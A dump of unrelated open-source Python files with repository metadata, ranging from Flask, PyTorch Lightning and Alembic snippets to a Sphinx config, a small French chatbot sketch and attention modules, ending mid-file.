Python
| false
| false
| 362
|
py
|
#!/usr/bin/env python3
from flask import Blueprint, Flask, render_template, request, url_for
controller = Blueprint('file', __name__, url_prefix='/file')
# @controller.route('/<string:title>', methods=['GET'])
# def lookup(title):
# if title == 'Republic': # TODO 2
# return render_template('republic.html') # TODO 2
# else:
# pass
|
[
"sqlconsult@hotmail.com"
] |
sqlconsult@hotmail.com
|
a116dd620bfbb78a14a50120bf42574e606bcb13
|
13d222bc3332378d433835914da26ed16b583c8b
|
/tests/challenge22/test_challenge22.py
|
4c076071ad9cc1c5e1409177a3652cf2a89fe86f
|
[] |
no_license
|
mattjhussey/pemjh
|
c27a09bab09cd2ade31dc23fffac07374bea9366
|
2ebb0a525d2d1c0ee28e83fdc2638c2bec97ac99
|
refs/heads/master
| 2023-04-16T03:08:59.390698
| 2023-04-08T10:54:00
| 2023-04-08T10:54:00
| 204,912,926
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 433
|
py
|
""" Tests for challenge22 """
from os.path import abspath, dirname, join
from robber import expect
from pemjh.challenge22 import main
def test_challenge22():
""" Regression testing challenge22 """
name_path = join(dirname(abspath(__file__)), 'names.txt')
with open(name_path, 'r') as name_file:
raw_names = [s.strip() for s in name_file.readlines()]
expect(main(raw_names)).to.eq(871198282)
|
[
"matthew.hussey@googlemail.com"
] |
matthew.hussey@googlemail.com
|
882eec1a180e7b4c69a1f2fb3cb0584d6a0baf0e
|
3f554f2e0ef235d93ecbcbbb2e21132f15ef12fd
|
/venv/Scripts/easy_install-3.7-script.py
|
68156d82a29ee68c2cabcd729c8d29ce9a4302ae
|
[] |
no_license
|
sanii-muthui/password_locker
|
189bb72389734cf59b11f27cf0c71d8d9dc4685a
|
b82ac4e87cc3301827d744f5e346a2737a959262
|
refs/heads/master
| 2022-01-09T08:04:37.240307
| 2019-07-22T09:56:20
| 2019-07-22T09:56:20
| 198,190,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 458
|
py
|
#!C:\Users\sanii\Desktop\password_locker\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install-3.7'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install-3.7')()
)
|
[
"muthuisanii@gmail.com"
] |
muthuisanii@gmail.com
|
636f08c92eda47b8eba96db768288a07393f0e21
|
c54f5a7cf6de3ed02d2e02cf867470ea48bd9258
|
/pyobjc/PyOpenGL-2.0.2.01/src/shadow/GL.EXT.separate_specular_color.0001.py
|
f61d2a53884bbcb6d4af41077bbd00d3c40380d1
|
[] |
no_license
|
orestis/pyobjc
|
01ad0e731fbbe0413c2f5ac2f3e91016749146c6
|
c30bf50ba29cb562d530e71a9d6c3d8ad75aa230
|
refs/heads/master
| 2021-01-22T06:54:35.401551
| 2009-09-01T09:24:47
| 2009-09-01T09:24:47
| 16,895
| 8
| 5
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,857
|
py
|
# This file was created automatically by SWIG.
# Don't modify this file, modify the SWIG interface instead.
# This file is compatible with both classic and new-style classes.
import _separate_specular_color
def _swig_setattr_nondynamic(self,class_type,name,value,static=1):
if (name == "this"):
if isinstance(value, class_type):
self.__dict__[name] = value.this
if hasattr(value,"thisown"): self.__dict__["thisown"] = value.thisown
del value.thisown
return
method = class_type.__swig_setmethods__.get(name,None)
if method: return method(self,value)
if (not static) or hasattr(self,name) or (name == "thisown"):
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self,class_type,name,value):
return _swig_setattr_nondynamic(self,class_type,name,value,0)
def _swig_getattr(self,class_type,name):
method = class_type.__swig_getmethods__.get(name,None)
if method: return method(self)
raise AttributeError,name
import types
try:
_object = types.ObjectType
_newclass = 1
except AttributeError:
class _object : pass
_newclass = 0
del types
__version__ = _separate_specular_color.__version__
__date__ = _separate_specular_color.__date__
__api_version__ = _separate_specular_color.__api_version__
__author__ = _separate_specular_color.__author__
__doc__ = _separate_specular_color.__doc__
GL_LIGHT_MODEL_COLOR_CONTROL_EXT = _separate_specular_color.GL_LIGHT_MODEL_COLOR_CONTROL_EXT
GL_SINGLE_COLOR_EXT = _separate_specular_color.GL_SINGLE_COLOR_EXT
GL_SEPARATE_SPECULAR_COLOR_EXT = _separate_specular_color.GL_SEPARATE_SPECULAR_COLOR_EXT
glInitSeparateSpecularColorEXT = _separate_specular_color.glInitSeparateSpecularColorEXT
__info = _separate_specular_color.__info
|
[
"ronaldoussoren@f55f28a5-9edb-0310-a011-a803cfcd5d25"
] |
ronaldoussoren@f55f28a5-9edb-0310-a011-a803cfcd5d25
|
bb7116e666e458d7ef6f117d052ae161ef3c4f90
|
94b29d5cd65e5783692af9896ea9c983cf182c2f
|
/tests/utilities/test_apply_func_torchtext.py
|
ae919668a77ea9363c816014f05272341ca6622e
|
[
"Apache-2.0"
] |
permissive
|
Programmer-RD-AI/pytorch-lightning
|
5d4ab64a887d0ac7d47987241a3213ae59840616
|
02a675241c826d7720c7e15d6fda3f5da0b28116
|
refs/heads/master
| 2023-08-15T22:04:53.632338
| 2021-10-17T13:47:24
| 2021-10-17T13:47:24
| 413,277,562
| 3
| 0
|
Apache-2.0
| 2021-10-04T04:49:55
| 2021-10-04T04:49:55
| null |
UTF-8
|
Python
| false
| false
| 2,651
|
py
|
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import torch
from pytorch_lightning.utilities.apply_func import move_data_to_device
from tests.helpers.imports import Dataset, Example, Field, Iterator
from tests.helpers.runif import RunIf
def _get_torchtext_data_iterator(include_lengths=False):
text_field = Field(
sequential=True,
pad_first=False, # nosec
init_token="<s>",
eos_token="</s>", # nosec
include_lengths=include_lengths,
) # nosec
example1 = Example.fromdict({"text": "a b c a c"}, {"text": ("text", text_field)})
example2 = Example.fromdict({"text": "b c a a"}, {"text": ("text", text_field)})
example3 = Example.fromdict({"text": "c b a"}, {"text": ("text", text_field)})
dataset = Dataset([example1, example2, example3], {"text": text_field})
text_field.build_vocab(dataset)
iterator = Iterator(
dataset,
batch_size=3,
sort_key=None,
device=None,
batch_size_fn=None,
train=True,
repeat=False,
shuffle=None,
sort=None,
sort_within_batch=None,
)
return iterator, text_field
@pytest.mark.parametrize("include_lengths", [False, True])
@pytest.mark.parametrize("device", [torch.device("cuda", 0)])
@RunIf(min_gpus=1)
def test_batch_move_data_to_device_torchtext_include_lengths(include_lengths, device):
data_iterator, _ = _get_torchtext_data_iterator(include_lengths=include_lengths)
data_iter = iter(data_iterator)
batch = next(data_iter)
batch_on_device = move_data_to_device(batch, device)
if include_lengths:
# tensor with data
assert batch_on_device.text[0].device == device
# tensor with length of data
assert batch_on_device.text[1].device == device
else:
assert batch_on_device.text.device == device
@pytest.mark.parametrize("include_lengths", [False, True])
def test_batch_move_data_to_device_torchtext_include_lengths_cpu(include_lengths):
test_batch_move_data_to_device_torchtext_include_lengths(include_lengths, torch.device("cpu"))
|
[
"noreply@github.com"
] |
Programmer-RD-AI.noreply@github.com
|
79321ece6462d20918c9ef544c17a191895225db
|
8bb3bcf914860c20fb4a7163a8e0691cd802dd65
|
/src/vsc/model/coverpoint_bin_single_val_model.py
|
2c3d70c1f5e7480e7a886bb90d2225f0d2d90df9
|
[
"Apache-2.0"
] |
permissive
|
nitinm694/pyvsc
|
8586cc2497f336289fecbfeb9e6dd788f4070b60
|
612de9e6244c685a3df1972e4860abfe35b614e1
|
refs/heads/master
| 2023-07-28T01:49:10.917496
| 2021-09-12T19:06:00
| 2021-09-12T19:06:00
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,961
|
py
|
# Created on Mar 20, 2020
#
# @author: ballance
from vsc.model.bin_expr_type import BinExprType
from vsc.model.coverpoint_bin_model_base import CoverpointBinModelBase
from vsc.model.expr_bin_model import ExprBinModel
from vsc.model.expr_literal_model import ExprLiteralModel
from vsc.model.rangelist_model import RangelistModel
class CoverpointBinSingleValModel(CoverpointBinModelBase):
def __init__(self, name, target_val : int):
super().__init__(name)
self.target_val = target_val
self.n_bins = 1
def finalize(self, bin_idx_base:int)->int:
super().finalize(bin_idx_base)
return 1
def get_bin_expr(self, bin_idx):
"""Builds expressions to represent the values in this bin"""
expr = ExprBinModel(
self.cp.target,
BinExprType.Eq,
ExprLiteralModel(self.target_val, False, 32)
)
return expr
def get_bin_name(self, bin_idx):
return self.name
def sample(self):
val = self.cp.get_val()
if val == self.target_val:
self.hit_bin_idx = 0
self.cp.coverage_ev(self.bin_idx_base)
else:
self.hit_bin_idx = -1
return self.hit_bin_idx
def get_bin_range(self, idx):
print("get_bin_range: " + str(idx))
return RangelistModel([self.target_val])
def accept(self, v):
v.visit_coverpoint_bin_single(self)
def equals(self, oth)->bool:
eq = isinstance(oth, CoverpointBinSingleValModel)
if eq:
eq &= self.target_val == oth.target_val
return eq
def clone(self)->'CoverpointBinSingleValModel':
ret = CoverpointBinSingleValModel(self.name, self.target_val)
ret.srcinfo_decl = None if self.srcinfo_decl is None else self.srcinfo_decl.clone()
return ret
|
[
"matt.ballance@gmail.com"
] |
matt.ballance@gmail.com
|
20891c001bfbe780b1f4865470d6788401eefa16
|
ce196aba0adde47ea2767eae1d7983a1ef548bb8
|
/求n,m的最小公倍数.py
|
8ff00c68cb9f7a31cebbfb654fe4a258fce95226
|
[] |
no_license
|
xiang-daode/Python3_codes
|
5d2639ffd5d65065b98d029e79b8f3608a37cf0b
|
06c64f85ce2c299aef7f9311e9473e0203a05b09
|
refs/heads/main
| 2023-08-30T14:59:55.123128
| 2021-11-03T05:12:24
| 2021-11-03T05:12:24
| 333,632,892
| 0
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 296
|
py
|
# 计算n,m的最小公倍数
def gbs(x,y):
if x>y:
z=y
else:
z=x
f=1
for i in range(z-1,2,-1):
if(x%i==0 and y%i==0):
f=f*i
x=x/i
y=y/i
f=f*x*y
print(f)
n=int(input())
m=int(input())
gbs(n,m)
|
[
"noreply@github.com"
] |
xiang-daode.noreply@github.com
|
3d6ade2c6dbc770b827d650cd0b41c4c9c3b901e
|
d9ccb2b8e549a594bf06868391481ea8669786ea
|
/migrations/versions/9320d2f7765b_add_source_file.py
|
c10af5965a24672f6ca7c873edbb88c525eefb10
|
[
"Apache-2.0"
] |
permissive
|
clld/dogonlanguages
|
00dd3895dffbb99c048f0d0a8970d6cd4199ff5c
|
2b0b510e853b77c9e356a9c73142401afc93b04a
|
refs/heads/master
| 2022-12-13T02:33:10.590590
| 2022-12-02T08:34:24
| 2022-12-02T08:34:24
| 25,243,999
| 1
| 2
|
Apache-2.0
| 2021-12-07T13:25:46
| 2014-10-15T07:39:00
|
Python
|
UTF-8
|
Python
| false
| false
| 858
|
py
|
# coding=utf-8
"""add source file
Revision ID: 9320d2f7765b
Revises: 1770d17056aa
Create Date: 2017-05-05 09:58:20.128175
"""
from alembic import op
from clld.db.migration import Connection
from clld.db.models.common import Source, Source_files
# revision identifiers, used by Alembic.
revision = '9320d2f7765b'
down_revision = '1770d17056aa'
def upgrade():
conn = Connection(op.get_bind())
spk = conn.pk(Source, 'heathetal2015')
conn.insert(
Source_files,
jsondata={
"thumbnail": None,
"web": None,
"size": 7531008,
"objid": "EAEA0-C97A-A1D2-2E76-0",
"original": "a.xls"},
id='heathetal2015-1',
name='Dogon.comp.vocab.UNICODE.xls',
ord=1,
mime_type='application/vnd.ms-excel',
object_pk=spk)
def downgrade():
pass
|
[
"xrotwang@googlemail.com"
] |
xrotwang@googlemail.com
|
e5a27eaa219e0fde7041e68c4eb80d954a19f87a
|
66c6f9a24c9a1f912e93f96b439b81a10cffac77
|
/test/vanilla/Expected/AcceptanceTests/BodyBoolean/bodyboolean/__init__.py
|
9582ec858066aa9339d3ef1d5f01d189ad7214ef
|
[
"MIT",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
kairu-ms/autorest.python
|
5dd0e8bf2ebf0c0dc148342003899fabd269f946
|
20870e3870fcfeae9567b63343d2320bf388f3c6
|
refs/heads/master
| 2023-04-29T23:00:50.568945
| 2020-01-17T18:03:00
| 2020-01-17T18:03:00
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 737
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from ._configuration import AutoRestBoolTestServiceConfiguration
from ._auto_rest_bool_test_service import AutoRestBoolTestService
__all__ = ['AutoRestBoolTestService', 'AutoRestBoolTestServiceConfiguration']
from .version import VERSION
__version__ = VERSION
|
[
"noreply@github.com"
] |
kairu-ms.noreply@github.com
|
2435d771630538e9959dd54e81aaf11fc02774d0
|
87b7ec1af5bde5aa46f1982008aecec00ca00c1d
|
/conf.py
|
027ac88796a93502408f1ac60968deead521e278
|
[
"MIT"
] |
permissive
|
kattni/Adafruit_CircuitPython_VS1053
|
ca656e64a83f74e398bbc0ad21d8c9fd27614270
|
20d5ac7f71117b8bdd4db75678ce98e3a6b19e49
|
refs/heads/master
| 2020-03-31T09:50:02.930951
| 2018-10-09T01:39:32
| 2018-10-09T01:39:32
| 152,112,523
| 0
| 0
| null | 2018-10-08T16:34:31
| 2018-10-08T16:34:31
| null |
UTF-8
|
Python
| false
| false
| 4,600
|
py
|
# -*- coding: utf-8 -*-
import os
import sys
sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.intersphinx',
'sphinx.ext.viewcode',
]
intersphinx_mapping = {'python': ('https://docs.python.org/3.4', None),'BusDevice': ('https://circuitpython.readthedocs.io/projects/bus_device/en/latest/', None),'CircuitPython': ('https://circuitpython.readthedocs.io/en/latest/', None)}
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'README'
# General information about the project.
project = u'Adafruit VS1053 Library'
copyright = u'2017 Tony DiCola'
author = u'Tony DiCola'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u'1.0'
# The full version, including alpha/beta/rc tags.
release = u'1.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#
default_role = "any"
# If true, '()' will be appended to :func: etc. cross-reference text.
#
add_function_parentheses = True
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if not on_rtd: # only import and set the theme if we're building docs locally
try:
import sphinx_rtd_theme
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path(), '.']
except:
html_theme = 'default'
html_theme_path = ['.']
else:
html_theme_path = ['.']
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Output file base name for HTML help builder.
htmlhelp_basename = 'AdafruitVS1053Librarydoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'AdafruitVS1053Library.tex', u'Adafruit VS1053 Library Documentation',
author, 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'adafruitVS1053library', u'Adafruit VS1053 Library Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'AdafruitVS1053Library', u'Adafruit VS1053 Library Documentation',
author, 'AdafruitVS1053Library', 'One line description of project.',
'Miscellaneous'),
]
|
[
"tony@tonydicola.com"
] |
tony@tonydicola.com
|
529a5ab95bf0f23e3253b65c5eec0ee18fc952aa
|
0455b5da2b6bc9fad7b92f6b99005a8c81cdda97
|
/emiratesnbd/items.py
|
9d273557032c6fd1404c5a4aab8e83a35ed96782
|
[] |
no_license
|
hristo-grudev/emiratesnbd
|
da22bf3f3023f5bd6b9e230a4df3da5ab61d509c
|
48494986f0ed44b15cc1b7b1a425a4d65582cf1f
|
refs/heads/main
| 2023-04-15T00:59:31.067111
| 2021-04-22T06:28:13
| 2021-04-22T06:28:13
| 360,414,897
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 138
|
py
|
import scrapy
class EmiratesnbdItem(scrapy.Item):
title = scrapy.Field()
description = scrapy.Field()
date = scrapy.Field()
|
[
"hr.grudev@gmail.com"
] |
hr.grudev@gmail.com
|
4be32626ca67e776aca8f11478838d70d8e803bb
|
5afd733a5c1f753601c69b8b4eae1b49edfbae7c
|
/201-300/282.py
|
f1575add29bfe60cd0d5c53e27f8449440e6ebb0
|
[] |
no_license
|
yanbinbi/leetcode
|
9dcd4a0160be915006455b83d6b7cd39e9819811
|
616a868bfa7bdd00195067b0477b0236a72d23e0
|
refs/heads/master
| 2021-05-13T19:34:17.222576
| 2017-11-12T02:04:31
| 2017-11-12T02:04:31
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,279
|
py
|
class Solution(object):
def addOperators(self, num, target):
"""
:type num: str
:type target: int
:rtype: List[str]
"""
self.ret =set()
self.dfs(num, [], target)
return list(self.ret)
def dfs(self, num, arr, target):
size = len(num)
if size == 0:
if len(arr) > 0:
self.cal(arr, target, '', False)
else:
for i in range(1, size+1):
if num[0] != '0' or i == 1:
arr.append(int(num[:i]))
self.dfs(num[i:], arr, target)
arr.pop()
def cal(self, arr, target, exp, reverse):
size = len(arr)
if size == 0 and target == 0:
self.ret.add(exp)
else:
val = arr[0]
exp += str(val)
plus, minus = ('+','-') if not reverse else ('-','+')
for i in range(1,size):
a, b = arr[i], arr[i:]
self.cal(b, target-val, exp+plus, reverse)
self.cal(b, -target+val, exp+minus, not reverse)
val *= a
exp += ('*'+str(a))
if val == target:
self.ret.add(exp)
|
[
"xukaifeng1986@gmail.com"
] |
xukaifeng1986@gmail.com
|
9d13794ae4997422a14e76c2f9e828ff273b8e4e
|
5537eec7f43098d216d2b550678c8d10b2a26f09
|
/venv/ansible/lib/python2.7/site-packages/azure/batch/models/task_scheduling_policy.py
|
220faadb2936c714ded099065c8ed5afe1731434
|
[] |
no_license
|
wipro-sdx/Automation
|
f0ae1512b8d9d491d7bacec94c8906d06d696407
|
a8c46217d0fbe51a71597b5db87cbe98ed19297a
|
refs/heads/master
| 2021-07-08T11:09:05.314435
| 2018-05-02T07:18:54
| 2018-05-02T07:18:54
| 131,812,982
| 0
| 1
| null | 2020-07-23T23:22:33
| 2018-05-02T07:15:28
|
Python
|
UTF-8
|
Python
| false
| false
| 1,183
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class TaskSchedulingPolicy(Model):
"""Specifies how tasks should be distributed across compute nodes.
:param node_fill_type: How tasks should be distributed across compute
nodes. Possible values include: 'spread', 'pack', 'unmapped'
:type node_fill_type: str or :class:`ComputeNodeFillType
<azure.batch.models.ComputeNodeFillType>`
"""
_validation = {
'node_fill_type': {'required': True},
}
_attribute_map = {
'node_fill_type': {'key': 'nodeFillType', 'type': 'ComputeNodeFillType'},
}
def __init__(self, node_fill_type):
self.node_fill_type = node_fill_type
|
[
"admin@example.com"
] |
admin@example.com
|
e00c4b648f1a238bca577a041f426ddc93bae731
|
b01429f27f8d7f4db7e3eba0abbb6be1ea67e2fa
|
/imageimage1.2/langage.py
|
dc64ee7d7051ab678f89b67c5e801ac667c1855a
|
[] |
no_license
|
pastrouveedespeudo/ste-fois-c-la-bonne
|
3dce8cdfc6b5523d9651e8ec9a143b7ab7789d21
|
9872c35423870c9854ee0bda120cca0c832c1fc9
|
refs/heads/master
| 2020-04-20T22:08:34.295196
| 2019-02-17T17:18:36
| 2019-02-17T17:18:36
| 169,129,734
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,165
|
py
|
from mémoire import *
from outils_fichier import *
from politesse import *
from outils_internet import *
#Regle
#ne seront maqué que les truk importants
#dans mémoire str.find la liste, si ya pas on ajoute fais le
#ca fait ia
class langage:
def début1(self):
#début1(self, oInput)
#self.oInput = oInput
politesse.politesse(self)
self.oInput = input("salut")
self.oInput = self.oInput.lower()
langage.exception()
print(self.oInput)
c = 0
for i in self.politesse:
if self.oInput != i:
pass
elif self.oInput == i:
c+=1
if c <= 0:
outils_fichier.ecris_propri(self, self.oInput, "politesse.py")
def exception(self):
exception1 = "ça va"
if self.oInput == "ca va" or self.oInput == "ca va ?" :
self.oInput = self.oInput.replace("c","ç")
elif self.oInput == "hey" or self.oInput == "Hey":
pass
def début1_1(self):
mémoire.liste(self)
liste = []
liste1 = [[],[],[],[],[],[],[],[],[],[],[],[],[]]
self.liste_langage = [] #liste importante
self.ponctu = [] #2eme lsite importante
liste.append(self.oInput)
c = 0
for i in liste:
for j in i:
if j == " ":
c+=1
else:
liste1[c].append(j)
for i in self.liste_ponctuation:
for j in liste1:
if j == [] or j == [""] or j == [" "] or j == [ ]:
pass
else:
j = "".join(j)
if i == j :
langage.début1_1_outils( "?", self.liste_langage, self.intero, i)
langage.début1_1_outils( "!", self.liste_langage, self.excla, i)
langage.début1_1_outils( ".", self.liste_langage, self.point, i)
langage.début1_1_outils( ",", self.liste_langage, self.virgule, i)
langage.début1_1_outils( "'", self.liste_langage, self.guillemet, i)
langage.début1_1_outils( ":", self.liste_langage, self.deuxpoints, i)
langage.début1_1_outils( "?!", self.liste_langage, self.interoexcla, i)
self.ponctu = self.oInput[-1]
self.oInput = self.oInput[:-1]
if self.liste_langage == []:
self.liste_langage.append("aucune ponctuation")
print(self.liste_langage)
def début1_1_outils(self, ponctuation, liste, késako, i):
mémoire.liste(self)
self.i = i
self.liste = liste
self.késako = késako
self.ponctuation = ponctuation
if self.i == self.ponctuation:
self.liste.extend(self.késako)
def début1_reponse(self):
pass
def définition_context_phrase(self):
liste = []
outils_internet.recherche_langage(self, self.oInput, liste)
self.politesse = ""
a = ["forme de politesse", "Forme de politesse", "Marque de politesse",
"Formule de salutation", "salutation", "Salutation", "Formule de politesse"]
for i in a:
formule_politesse = str(liste).find(str(i))
if formule_politesse > 0:
print(self.oInput + " beauté, c deja un bon debut !")
#formule de politesse
self.politesse = True
break
if self.politesse == True:
pass
#passe a la suite sinon
#faut trouvé ce que le pelo raconte
langage = langage()
langage.début1()
langage.début1_1()
langage.définition_context_phrase()
|
[
"noreply@github.com"
] |
pastrouveedespeudo.noreply@github.com
|
b04ed6d55babef029018dcc05dcb6afed7e6ad71
|
0dc27aeb342b9b898256adf256c5b77a666e68fb
|
/lm386/codes/coeffs.py
|
f505630bc52bdbb325464e11d00650e33c721eb4
|
[] |
no_license
|
gadepall/EE2230
|
7861b898d90abf04b935cb77b31f2c70e290b096
|
739b01d8f5da93cc5c38121e62ea6d9e87851146
|
refs/heads/master
| 2020-03-25T20:25:57.885565
| 2019-10-06T01:57:13
| 2019-10-06T01:57:13
| 144,130,660
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,010
|
py
|
import numpy as np
def dir_vec(A,B):
return B-A
def norm_vec(A,B):
return omat@dir_vec(A,B)
#Generate line points
def line_gen(A,B):
len =10
x_AB = np.zeros((2,len))
lam_1 = np.linspace(0,1,len)
for i in range(len):
temp1 = A + lam_1[i]*(B-A)
x_AB[:,i]= temp1.T
return x_AB
#Centre and Radius of the circumcircle
def ccircle(A,B,C):
p = np.zeros(2)
n1 = dir_vec(B,A)
p[0] = 0.5*(np.linalg.norm(A)**2-np.linalg.norm(B)**2)
n2 = dir_vec(C,B)
p[1] = 0.5*(np.linalg.norm(B)**2-np.linalg.norm(C)**2)
#Intersection
N=np.vstack((n1,n2))
O=np.linalg.inv(N)@p
r = np.linalg.norm(A -O)
return O,r
def line_intersect(n1,c1,n2,c2):
N=np.vstack((n1,n2))
p = np.zeros(2)
p[0] = c1
p[1] = c2
P=np.linalg.inv(N)@p
return P
#Intersection
A = np.array([-2,-2])
B = np.array([1,3])
dvec = np.array([-1,1])
omat = np.array([[0,1],[-1,0]])
#AB =np.vstack((A,B)).T
#print (dir_vec(A,B))
#print (norm_vec(A,B))
|
[
"gadepall@gmail.com"
] |
gadepall@gmail.com
|
6f9f7154c397d558289889cac3d1ff8b7cb8991b
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/otherforms/_upstarts.py
|
a99715c49d6b20f79507a7ced2a14b39179cb8bc
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 226
|
py
|
#calss header
class _UPSTARTS():
def __init__(self,):
self.name = "UPSTARTS"
self.definitions = upstart
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['upstart']
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
0cb85670c7ca2f434db6351d257e24ca060fa7f1
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/380/usersdata/341/93264/submittedfiles/principal.py
|
6cda24a7d78aabf878f6abdc614407b80d6ddb97
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146
| 2017-12-22T16:05:45
| 2017-12-22T16:05:45
| 69,566,344
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 276
|
py
|
# -*- coding: utf-8 -*-
#COMECE AQUI ABAIXO
n=int(input('Digite a quantidade de notas: '))
notas = []
for i in range (0,n,1):
notas.append(float(input('Digite a nota%d: ' % (i+1))))
media=0
for i in range (0,n,1):
media += notas[i]/n
print(notas[i])
print(media)
|
[
"rafael.mota@ufca.edu.br"
] |
rafael.mota@ufca.edu.br
|
279efe43b1dbd7cc075bd5b7c93df9bcdff1d52d
|
b5e93a09ee136b2b035c9958557e3e4091d8d9fd
|
/horch/models/attention.py
|
d13ba6fb39ab10e20773465ea90474516517c923
|
[
"MIT"
] |
permissive
|
ccglyyn/pytorch-hrvvi-ext
|
2ee0cd27461c344783150535fbadea5fbe29f25b
|
a020da3543982464ff3888ff84b311e98a130d6d
|
refs/heads/master
| 2022-04-20T13:35:07.561985
| 2020-04-21T10:36:36
| 2020-04-21T10:36:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,883
|
py
|
import torch
from horch.models.modules import Conv2d, HardSigmoid, Identity
from torch import nn as nn
from torch.nn import functional as F
class SEModule(nn.Module):
def __init__(self, in_channels, reduction=8):
super().__init__()
channels = in_channels // reduction
self.pool = nn.AdaptiveAvgPool2d(1)
self.layers = nn.Sequential(
nn.Linear(in_channels, channels),
nn.ReLU(True),
nn.Linear(channels, in_channels),
nn.Sigmoid(),
)
def forward(self, x):
b, c = x.size()[:2]
s = self.pool(x).view(b, c)
s = self.layers(s).view(b, c, 1, 1)
return x * s
class CBAMChannelAttention(nn.Module):
def __init__(self, in_channels, reduction=8):
super().__init__()
channels = in_channels // reduction
self.mlp = nn.Sequential(
nn.Linear(in_channels, channels),
nn.ReLU(True),
nn.Linear(channels, in_channels),
)
def forward(self, x):
b, c = x.size()[:2]
aa = F.adaptive_avg_pool2d(x, 1).view(b, c)
aa = self.mlp(aa)
am = F.adaptive_max_pool2d(x, 1).view(b, c)
am = self.mlp(am)
